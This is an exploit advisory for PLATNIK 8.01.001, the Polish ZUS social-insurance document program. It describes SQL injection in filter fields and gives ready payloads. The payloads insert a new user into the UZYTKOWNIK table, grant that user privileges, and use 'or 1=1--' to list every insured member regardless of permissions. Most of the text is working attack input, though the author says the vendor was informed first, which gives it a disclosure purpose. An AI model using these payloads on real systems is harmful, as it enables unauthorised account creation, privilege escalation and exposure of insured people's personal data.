# Exploit Title: PLATNIK - SQL Injection Vulnerability # Discovered by: podatnik386 Description: PLATNIK is the official Polish program to support documents for the Social Insurance Company (pl. ZUS). The application includes several fields that are vulnerable to sql injection. Vulnerable version: 8.01.001 http://www.platnik.info.pl/ EXPLOIT(Tested on MSSQL2005 Express): ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #### Field: Administration/Dziennik-Archiwum dziennika operacji(Events) tab / filter field (<=, =>, <, >) <'YYYY-MM-DD') SQL_QUERY FOR EXAMPLE How to add new user: <'2010-02-28')INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)-- How to increase user privileges: <'2010-02-28')INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)-- #### Field: Documents(ZUS ZSWA) tab / III-VI tab / filter field - okres pracy(work period) FOR EXAMPLE Show all insured members(query ignores the permissions assigned to the user): <05-02-2010) or 1=1-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The manufacturer has been informed prior to publication(But they ignored the vulnerability). //////////////////////////////////////